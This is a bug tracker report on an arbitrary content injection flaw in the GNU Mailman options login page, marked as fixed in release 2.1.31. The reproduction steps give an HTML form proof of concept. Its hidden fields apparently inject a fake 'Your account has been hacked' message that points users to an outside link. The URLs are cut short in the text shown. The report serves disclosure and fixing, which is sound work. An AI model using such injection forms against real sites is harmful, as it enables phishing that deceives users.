Arbitrary Content Injection via the options login page.
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
GNU Mailman |
Fix Released
|
Medium
|
Mark Sapiro |
Bug Description
An issue similar to CVE - https:/
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>
<form action="https:/
<input type="hidden" name="email" value="
<input type="hidden" name="UserOptions" value="
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to https:/
Related branches
CVE References
Changed in mailman: | |
milestone: | none → 2.1.31 |
Changed in mailman: | |
status: | Confirmed → Fix Released |
information type: | Private Security → Public |